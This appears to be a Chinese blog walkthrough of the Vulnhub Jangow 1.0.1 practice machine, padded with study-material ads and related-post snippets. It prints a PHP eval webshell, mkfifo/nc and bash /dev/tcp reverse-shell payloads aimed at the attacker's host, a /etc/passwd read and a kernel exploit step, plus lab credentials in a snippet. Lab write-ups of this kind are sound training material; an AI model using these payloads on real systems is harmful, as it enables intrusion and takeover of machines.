2024年最新渗透测试Jangow1,面试阿里P7岗

已于 2024-05-06 19:46:30 修改
阅读量357 收藏 9
点赞数 4
分类专栏: 程序员 文章标签: 面试 职场和发展
于 2024-05-06 19:46:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76224223/article/details/138506004
版权
本文介绍了一个全面的IT学习资源包,包括零基础教程、进阶课程、web渗透技巧(如漏洞发现、利用和权限提升),强调了知识体系化的重要性。资源中还包含了Linux命令执行、PHP反弹shell等内容,以及鼓励技术交流和团队学习。
摘要由CSDN通过智能技术生成

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

需要这份系统化的资料的朋友,可以戳这里获取

image-20220325151528095

这里可以知道目标开启了21和80端口,分别是ftp服务和Apache服务

三、web渗透

1、漏洞发现

开启了80端口,部署的是Apache服务,先去访问一下web服务,看是否有漏洞

image-20220325151952039

在一个页面找到一个url地址存在参数,页面为空白,参数未被赋值,猜测可能是代码执行漏洞或者命令执行漏洞,经过探测发现是命令执行漏洞。

image-20220325152102036

2、漏洞利用

cat /etc/passwd

通过linux命令查看其账号密码

image-20220325152448446

虽然获取了文件内容,但是无法直接登录。既然可以执行linux命令,尝试写一句话木马直接getshell

echo '<?php @eval($_POST['shell']);?>' >> getshell.php
这里介意使用post方法,get方法蚁剑无法连接

image-20220325153002301

蚁剑连接

image-20220325153046443

连接成功

image-20220325153256760

收集信息,扩大战果

image-20220325153518774

image-20220325153635169

找到两个密码,但是并没有找到flag,应该值root目录,我们现在没有权限,尝试反弹shell,查看系统版本,使用系统内核漏洞提权

3、反弹shell

使用蚁剑新建一个php文件,写一个反弹shell在PHP文件里,使用kali监听对于端口,然后访问该文件,即可反弹shell

nc -lvp 443

image-20220325154630402

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.11 443 >/tmp/f');?>

<?php system('bash -i > /dev/tcp/192.168.0.11/443 0>&1 2>&1')?>
不知道为啥bash反弹不能使用

image-20220325154413017

访问该文件

image-20220325154749266

反弹成功

image-20220325154912812

切换完整的交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20220325155134405

四、权限提升

1、查看系统版本

uname -a

image-20220325155455095

2、根据系统版本提权

searchsploit ubuntu 4.4.0

image-20220325155830777

3、采用45010.c这个文件进行提权

img
img

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

需要这份系统化的资料的朋友,可以戳这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

fram_
关注
专栏目录
阿里P7一二三面面试
05-24
阿里P7一二三面面试题,绝对纯干货,架构、框架、数据库等相关知识,基本上涵盖大部分知识点,对于面试帮助很大!
jangow靶机渗透
leoNULLdo的博客
12-05 1085
原理:在KALI上配置一条iptables规则,将到1-65535端口的流量全部重定向到4444端口,在KALI上监听4444端口,然后再从靶机上发起到1-65535的访问,如果到某个端口的流量未被拦截,那么到该端口的流量将成功转发到4444端口。(2)用户名:jangow01 密码:abygurl69,可登录ftp,ftp的版本信息为vsftpd3.0.3,在jangow01的家目录中找到了一个空flag,但是ftp的权限不允许上传文件。在蚁剑的虚拟终端中执行脚本:./b.sh,不行。
Jangow
果粒程
05-15 705
尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面。使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的可以登陆,翻看下没有什么有用的信息。用浏览器去访问shell.php文件,成功反弹shell。上传exp文件到靶机,增加执行权限,然后执行。我使用的是45010.c,将文件下载到本地。确认开放了21、80端口。
jangow靶机实验实战演练
lianliandad的博客
11-02 888
Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限。
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1179
Vulnhub - JANGOW: 1.0.1 靶标实战
渗透测试Jangow1.0.1--入门级
G208_522的博客
03-25 5747
渗透测试Jangow101(一) 一、环境搭建 1、靶机:ip:192.168.0.9 靶机下载:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova 2、攻击机:ip:192.168.0.11 3、如何搭建 下载后的文件直接右键打开方式,选择virtualbox(介意使用virtualbox) 使用virtualbox打开后会显示靶机ip 二、信息收集 1、nmap扫描开放端口 nmap -sC -sV 192.168.0.9 -sV 扫描目
大厂面试题第一季-阿里篇-对标阿里P7面试教程
04-10
大厂面试题第一季-阿里篇-004-阿里面试被虐记,90%被问到的JVM面试题-1.mp4 大厂面试题第一季-阿里篇-004-阿里面试被虐记,90%被问到的JVM面试题-3.mp4 大厂面试题第一季-阿里篇-004-阿里面试被虐记,90%被问到的JVM...
亲测阿里P6P7面试经历以及面试题,掌握了大概率offer
12-21
在准备面试阿里P6P7职位时,候选人需要对多个技术领域有深入的理解和掌握。根据给出的文件内容,我们可以提炼出以下知识点,这些知识点是面试者在准备过程中应当重点复习和掌握的。 1. Java基础知识:包括Java语言...
面试阿里P7需要掌握的技术.md
07-22
面试阿里P7需要掌握的技术
阿里P7面试题整理集合
04-13
阿里P7面试题整理集合】的面试涵盖了Java开发中的多个关键知识点,主要涉及多线程、数据库(MySQL)、JVM调优、Redis、Spring框架、Dubbo服务治理以及问题解决能力。以下是对这些主题的详细说明: 1. **多线程**...
Vulnhub靶机:JANGOW_ 1.0.1
LainWith的博客
10-06 1243
Jangow(此系列共1台)发布日期:202111月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 1378
从靶机导入到最后的提权这一过程,重在思路的建立.
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 3334
一次打靶记录。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1181
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
Vulnhub靶场,Jangow靶机环境找不到ip解决方法。
m0_64376783的博客
04-14 867
删除etc得到了/ vim /etc 接着补全 vim /etc/network 回车看见网卡界面。先配置好,因为扫描的时候会扫不到ip 网络模式调节为桥接模式,然后开机,按e键,进入编辑模式输入。pwd 查看目录 cd init.d 进入目录,ls查看,看见networking。小小挫折,自己解决,那当然是不可能的。要进入vim /etc/network/interfaces 修改网卡。尝试关机重启,重启以后一直在加载,说明没有效果,方法行不通。ip a查看 网卡ens33 斜杠打不了,只能一步步进入。
Jangow-1.0.1靶机
m0_59151303的博客
07-31 536
发现html目录下有个backup文件,里面也有账号密码,继续寻找,找到一串md5。发现wordpress文件夹下有一个config.php,里面有数据库的账号密码。开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了。发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀。先尝试反弹一个shell过来,通过蚁剑写php反弹shell。发现是有网页的,随便点点,看看有没有能注入或者渗透的点。我们试着运行一下命令,发现是可以运行命令的。暂时没用,先保存一下,继续查找。
Jangow靶机攻略
cheapkiller的博客
07-31 204
4.编辑一句话木马注入echo '<?5.接下来查看文件输入ls。搭建jangow靶机环境。3.输入id查看回显位置。6.使用工具蚁剑进行进入。7.我们可以看到进入成功。1.扫描目标主机地址。
每周打靶练习之JANGOW:1.0.1
chhsbsjs的博客
01-29 518
之后在原来的页面下随便点击功能点发现Buscar点进去就是刚刚扫描出来的空白页但是后面多了个参数,试试命令执行。发现该目录下还有一个wordpress目录,进去发现一个config配置文件,有数据库账号密码。然后试了各种方法都没有反弹回来,后来发现靶机只能通过443端口通信所以我们对命令进行一个修改。我们选择一个下载后上传上去,先上传到网站目录下我们在移到家目录下然后赋予权限。
Jangow复现
最新发布
weixin_61982677的博客
10-08 626
删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"编辑文件 vim /etc/network/interfaces (将网卡信息设置为自己的网卡,重启电脑即可生效。首先选择标红的exp,直接看45010.c,现在要把复制到对方的服务器上面进行提权。kali监听自己的443端口:nc -lvp 443。在之前的shell.php写入反弹shell。然后进行编译以及加权限 ,然后运行。在本地的kali进行查询exp。获得 root 权限。
阿里P7面试教程:数据库索引与JVM深入解析
3. JVM面试题:在 "阿里面试被虐记,90%被问到的JVM面试题" 中,讨论了Java虚拟机的基本概念、内存模型、垃圾回收机制、类加载机制等关键知识点。JVM是Java程序的运行环境,对于任何使用Java语言的开发者而言,深入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值